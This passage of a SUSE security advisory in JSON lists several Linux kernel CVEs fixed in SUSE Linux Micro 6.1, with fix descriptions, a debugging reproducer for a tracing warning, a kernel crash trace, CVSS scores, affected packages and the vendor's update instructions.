"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-54209"
},
{
"cve": "CVE-2023-54210",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54210"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nBluetooth: hci_sync: Avoid use-after-free in dbg for hci_remove_adv_monitor()\n\nKASAN reports that there\u0027s a use-after-free in\nhci_remove_adv_monitor(). Trawling through the disassembly, you can\nsee that the complaint is from the access in bt_dev_dbg() under the\nHCI_ADV_MONITOR_EXT_MSFT case. The problem case happens because\nmsft_remove_monitor() can end up freeing the monitor\nstructure. Specifically:\n hci_remove_adv_monitor() -\u003e\n msft_remove_monitor() -\u003e\n msft_remove_monitor_sync() -\u003e\n msft_le_cancel_monitor_advertisement_cb() -\u003e\n hci_free_adv_monitor()\n\nLet\u0027s fix the problem by just stashing the relevant data when it\u0027s\nstill valid.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54210",
"url": "https://www.suse.com/security/cve/CVE-2023-54210"
},
{
"category": "external",
"summary": "SUSE Bug 1255955 for CVE-2023-54210",
"url": "https://bugzilla.suse.com/1255955"
},
{
"category": "external",
"summary": "SUSE Bug 1255956 for CVE-2023-54210",
"url": "https://bugzilla.suse.com/1255956"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "important"
}
],
"title": "CVE-2023-54210"
},
{
"cve": "CVE-2023-54211",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54211"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ntracing: Fix warning in trace_buffered_event_disable()\n\nWarning happened in trace_buffered_event_disable() at\n WARN_ON_ONCE(!trace_buffered_event_ref)\n\n Call Trace:\n ? __warn+0xa5/0x1b0\n ? trace_buffered_event_disable+0x189/0x1b0\n __ftrace_event_enable_disable+0x19e/0x3e0\n free_probe_data+0x3b/0xa0\n unregister_ftrace_function_probe_func+0x6b8/0x800\n event_enable_func+0x2f0/0x3d0\n ftrace_process_regex.isra.0+0x12d/0x1b0\n ftrace_filter_write+0xe6/0x140\n vfs_write+0x1c9/0x6f0\n [...]\n\nThe cause of the warning is in __ftrace_event_enable_disable(),\ntrace_buffered_event_enable() was called once while\ntrace_buffered_event_disable() was called twice.\nReproduction script show as below, for analysis, see the comments:\n ```\n #!/bin/bash\n\n cd /sys/kernel/tracing/\n\n # 1. Register a \u0027disable_event\u0027 command, then:\n # 1) SOFT_DISABLED_BIT was set;\n # 2) trace_buffered_event_enable() was called first time;\n echo \u0027cmdline_proc_show:disable_event:initcall:initcall_finish\u0027 \u003e \\\n set_ftrace_filter\n\n # 2. Enable the event registered, then:\n # 1) SOFT_DISABLED_BIT was cleared;\n # 2) trace_buffered_event_disable() was called first time;\n echo 1 \u003e events/initcall/initcall_finish/enable\n\n # 3. Try to call into cmdline_proc_show(), then SOFT_DISABLED_BIT was\n # set again!!!\n cat /proc/cmdline\n\n # 4. Unregister the \u0027disable_event\u0027 command, then:\n # 1) SOFT_DISABLED_BIT was cleared again;\n # 2) trace_buffered_event_disable() was called second time!!!\n echo \u0027!cmdline_proc_show:disable_event:initcall:initcall_finish\u0027 \u003e \\\n set_ftrace_filter\n ```\n\nTo fix it, IIUC, we can change to call trace_buffered_event_enable() at\nfist time soft-mode enabled, and call trace_buffered_event_disable() at\nlast time soft-mode disabled.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54211",
"url": "https://www.suse.com/security/cve/CVE-2023-54211"
},
{
"category": "external",
"summary": "SUSE Bug 1255843 for CVE-2023-54211",
"url": "https://bugzilla.suse.com/1255843"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-54211"
},
{
"cve": "CVE-2023-54215",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54215"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nvirtio-vdpa: Fix cpumask memory leak in virtio_vdpa_find_vqs()\n\nFree the cpumask allocated by create_affinity_masks() before returning\nfrom the function.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54215",
"url": "https://www.suse.com/security/cve/CVE-2023-54215"
},
{
"category": "external",
"summary": "SUSE Bug 1255957 for CVE-2023-54215",
"url": "https://bugzilla.suse.com/1255957"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-54215"
},
{
"cve": "CVE-2023-54219",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54219"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nRevert \"IB/isert: Fix incorrect release of isert connection\"\n\nCommit: 699826f4e30a (\"IB/isert: Fix incorrect release of isert connection\") is\ncausing problems on OPA when DEVICE_REMOVAL is happening.\n\n ------------[ cut here ]------------\n WARNING: CPU: 52 PID: 2117247 at drivers/infiniband/core/cq.c:359\nib_cq_pool_cleanup+0xac/0xb0 [ib_core]\n Modules linked in: nfsd nfs_acl target_core_user uio tcm_fc libfc\nscsi_transport_fc tcm_loop target_core_pscsi target_core_iblock target_core_file\nrpcsec_gss_krb5 auth_rpcgss nfsv4 dns_resolver nfs lockd grace fscache netfs\nrfkill rpcrdma rdma_ucm ib_srpt sunrpc ib_isert iscsi_target_mod target_core_mod\nopa_vnic ib_iser libiscsi ib_umad scsi_transport_iscsi rdma_cm ib_ipoib iw_cm\nib_cm hfi1(-) rdmavt ib_uverbs intel_rapl_msr intel_rapl_common sb_edac ib_core\nx86_pkg_temp_thermal intel_powerclamp coretemp i2c_i801 mxm_wmi rapl iTCO_wdt\nipmi_si iTCO_vendor_support mei_me ipmi_devintf mei intel_cstate ioatdma\nintel_uncore i2c_smbus joydev pcspkr lpc_ich ipmi_msghandler acpi_power_meter\nacpi_pad xfs libcrc32c sr_mod sd_mod cdrom t10_pi sg crct10dif_pclmul\ncrc32_pclmul crc32c_intel drm_kms_helper drm_shmem_helper ahci libahci\nghash_clmulni_intel igb drm libata dca i2c_algo_bit wmi fuse\n CPU: 52 PID: 2117247 Comm: modprobe Not tainted 6.5.0-rc1+ #1\n Hardware name: Intel Corporation S2600CWR/S2600CW, BIOS\nSE5C610.86B.01.01.0014.121820151719 12/18/2015\n RIP: 0010:ib_cq_pool_cleanup+0xac/0xb0 [ib_core]\n Code: ff 48 8b 43 40 48 8d 7b 40 48 83 e8 40 4c 39 e7 75 b3 49 83\nc4 10 4d 39 fc 75 94 5b 5d 41 5c 41 5d 41 5e 41 5f c3 cc cc cc cc \u003c0f\u003e 0b eb a1\n90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 0f 1f\n RSP: 0018:ffffc10bea13fc80 EFLAGS: 00010206\n RAX: 000000000000010c RBX: ffff9bf5c7e66c00 RCX: 000000008020001d\n RDX: 000000008020001e RSI: fffff175221f9900 RDI: ffff9bf5c7e67640\n RBP: ffff9bf5c7e67600 R08: ffff9bf5c7e64400 R09: 000000008020001d\n R10: 0000000040000000 R11: 0000000000000000 R12: ffff9bee4b1e8a18\n R13: dead000000000122 R14: dead000000000100 R15: ffff9bee4b1e8a38\n FS: 00007ff1e6d38740(0000) GS:ffff9bfd9fb00000(0000) knlGS:0000000000000000\n CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n CR2: 00005652044ecc68 CR3: 0000000889b5c005 CR4: 00000000001706e0\n Call Trace:\n \u003cTASK\u003e\n ? __warn+0x80/0x130\n ? ib_cq_pool_cleanup+0xac/0xb0 [ib_core]\n ? report_bug+0x195/0x1a0\n ? handle_bug+0x3c/0x70\n ? exc_invalid_op+0x14/0x70\n ? asm_exc_invalid_op+0x16/0x20\n ? ib_cq_pool_cleanup+0xac/0xb0 [ib_core]\n disable_device+0x9d/0x160 [ib_core]\n __ib_unregister_device+0x42/0xb0 [ib_core]\n ib_unregister_device+0x22/0x30 [ib_core]\n rvt_unregister_device+0x20/0x90 [rdmavt]\n hfi1_unregister_ib_device+0x16/0xf0 [hfi1]\n remove_one+0x55/0x1a0 [hfi1]\n pci_device_remove+0x36/0xa0\n device_release_driver_internal+0x193/0x200\n driver_detach+0x44/0x90\n bus_remove_driver+0x69/0xf0\n pci_unregister_driver+0x2a/0xb0\n hfi1_mod_cleanup+0xc/0x3c [hfi1]\n __do_sys_delete_module.constprop.0+0x17a/0x2f0\n ? exit_to_user_mode_prepare+0xc4/0xd0\n ? syscall_trace_enter.constprop.0+0x126/0x1a0\n do_syscall_64+0x5c/0x90\n ? syscall_exit_to_user_mode+0x12/0x30\n ? do_syscall_64+0x69/0x90\n ? syscall_exit_work+0x103/0x130\n ? syscall_exit_to_user_mode+0x12/0x30\n ? do_syscall_64+0x69/0x90\n ? exc_page_fault+0x65/0x150\n entry_SYSCALL_64_after_hwframe+0x6e/0xd8\n RIP: 0033:0x7ff1e643f5ab\n Code: 73 01 c3 48 8b 0d 75 a8 1b 00 f7 d8 64 89 01 48 83 c8 ff c3\n66 2e 0f 1f 84 00 00 00 00 00 90 f3 0f 1e fa b8 b0 00 00 00 0f 05 \u003c48\u003e 3d 01 f0\nff ff 73 01 c3 48 8b 0d 45 a8 1b 00 f7 d8 64 89 01 48\n RSP: 002b:00007ffec9103cc8 EFLAGS: 00000206 ORIG_RAX: 00000000000000b0\n RAX: ffffffffffffffda RBX: 00005615267fdc50 RCX: 00007ff1e643f5ab\n RDX: 0000000000000000 RSI: 0000000000000800 RDI: 00005615267fdcb8\n RBP: 00005615267fdc50 R08: 0000000000000000 R09: 0000000000000000\n R10: 00007ff1e659eac0 R11: 0000000000000206 R12: 00005615267fdcb8\n R13: 00000000000\n---truncated---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54219",
"url": "https://www.suse.com/security/cve/CVE-2023-54219"
},
{
"category": "external",
"summary": "SUSE Bug 1256231 for CVE-2023-54219",
"url": "https://bugzilla.suse.com/1256231"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.4,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-54219"
},
{
"cve": "CVE-2023-54220",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54220"
}
],
"notes": [
{
"category": "general",
